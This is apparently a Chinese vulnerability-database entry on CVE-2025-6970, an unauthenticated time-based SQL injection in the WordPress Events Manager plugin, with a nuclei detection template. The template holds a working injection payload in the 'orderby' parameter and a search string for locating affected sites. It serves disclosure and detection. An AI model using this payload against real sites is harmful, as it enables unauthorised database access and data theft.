WordPress Events Manager SQL Injection Vulnerability

漏洞信息

漏洞名称: WordPress Events Manager SQL Injection Vulnerability

漏洞编号:

  • CVE: CVE-2025-6970

漏洞类型: SQL注入

漏洞等级: 严重

漏洞描述: 该漏洞影响WordPress的Events Manager插件,这是一个用于管理日历、预订、门票等的插件,广泛应用于需要事件管理功能的网站。由于插件在所有版本至7.0.3中对’orderby’参数的用户输入进行了不充分的转义,并且对现有SQL查询的准备不足,导致存在时间基于的SQL注入漏洞。这使得未经认证的攻击者能够将额外的SQL查询附加到现有查询中,从而可能从数据库中提取敏感信息。此漏洞的严重性在于它允许未经认证的攻击者远程执行SQL命令,可能导致数据泄露、服务中断等安全风险。由于攻击无需认证,且可以自动化利用,因此对使用受影响版本插件的网站构成了严重威胁。

产品厂商: WordPress

产品名称: Events Manager – Calendar, Bookings, Tickets, and more!

影响版本: version <= 7.0.3

搜索语法: /wp-content/plugins/events-manager/

来源: https://github.com/projectdiscovery/nuclei-templates/blob/5faaa4a868ac71d703fe0839897ccb9898a26a42/http%2Fcves%2F2025%2FCVE-2025-6970.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

id: CVE-2025-6970

info:
  name: WordPress Events Manager <= 7.0.3 - Unauthenticated SQL Injection via orderby Parameter
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: Fixed in 6.6.5,7.0.4
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6970
    - https://wpscan.com/vulnerability/CVE-2025-6970
    - https://patchstack.com/database/vulnerability/events-manager/wordpress-events-manager-calendar-bookings-tickets-and-more-plugin-7-0-3-unauthenticated-sql-injection-via-orderby-parameter
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager/events-manager-703-unauthenticated-sql-injection-via-orderby-parameter
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/events-manager/"
  tags: cve,cve2025,events-manager,sqli,time-based,wordpress,wpscan,wp-plugin,unauth

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=search_events&orderby=1*(select(sleep(5)))

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'em-item-info', 'em-item-title', 'em-item-desc')
          - status_code == 200
          - 'duration>=5'
        condition: and